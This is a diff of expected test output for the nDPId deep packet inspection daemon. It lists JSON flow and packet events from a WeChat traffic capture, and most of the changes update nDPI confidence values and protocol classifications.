-00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1492167401063,"flow_last_seen":1492167448091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":12550,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1492167452759,"flow_last_seen":1492167467498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":32873,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1492167453010,"flow_last_seen":1492167467495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":8726,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1492167454457,"flow_last_seen":1492167470188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":60307,"flow_avg_l4_payload_len":701,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1492167454458,"flow_last_seen":1492167467494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":16177,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1492167454818,"flow_last_seen":1492167477932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3993,"flow_tot_l4_payload_len":57290,"flow_avg_l4_payload_len":596,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167455528,"flow_last_seen":1492167467498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167378674,"flow_last_seen":1492167401175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":15799,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1492167378926,"flow_last_seen":1492167401170,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8225,"flow_tot_l4_payload_len":23125,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167380581,"flow_last_seen":1492167401124,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1492167400812,"flow_last_seen":1492167448100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":17075,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1492167401063,"flow_last_seen":1492167448091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":12550,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1492167452759,"flow_last_seen":1492167467498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":32873,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1492167453010,"flow_last_seen":1492167467495,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":8726,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1492167454457,"flow_last_seen":1492167470188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":60307,"flow_avg_l4_payload_len":701,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1492167454458,"flow_last_seen":1492167467494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":16177,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1492167454818,"flow_last_seen":1492167477932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3993,"flow_tot_l4_payload_len":57290,"flow_avg_l4_payload_len":596,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167455528,"flow_last_seen":1492167467498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"}} 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167345896,"flow_last_seen":1492167360666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167350385,"flow_last_seen":1492167350562,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6290,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167351067,"flow_last_seen":1492167352398,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4266,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167350385,"flow_last_seen":1492167350562,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6290,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167351067,"flow_last_seen":1492167352398,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4266,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"}} 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1492167345896,"flow_last_seen":1492167360663,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167382020,"flow_last_seen":1492167402666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167338426,"flow_last_seen":1492167458187,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167338426,"flow_last_seen":1492167458187,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1492167382020,"flow_last_seen":1492167402666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1492167338426,"flow_last_seen":1492167458187,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1492167338426,"flow_last_seen":1492167458187,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":886,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167639887,"flow_last_seen":1492167639887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167639887,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1492167639887,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167639887,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8T5xAAEAGxaDAqAFny82XotNhAbttdZ2FAAAAAKACchD+DQAAAgQFtAQCCAoAMdIZAAAAAAEDAwc="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167640138,"flow_last_seen":1492167640138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167640138,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1492167640138,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640138,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8VUZAAEAGv\/bAqAFny82XotNiAbsbK4ceAAAAAKACchBmfwAAAgQFtAQCCAoAMdJYAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":889,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1492167640203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167640203,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702Ea0aYHbXWdhqASN8gHqwAAAgQFoAQCCApF8injADHSGQEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":890,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1492167640203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167640203,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0T51AAEAGxafAqAFny82XotNhAbttdZ2GGtGmCIAQAOVs9wAAAQEICgAx0mhF8inj"} 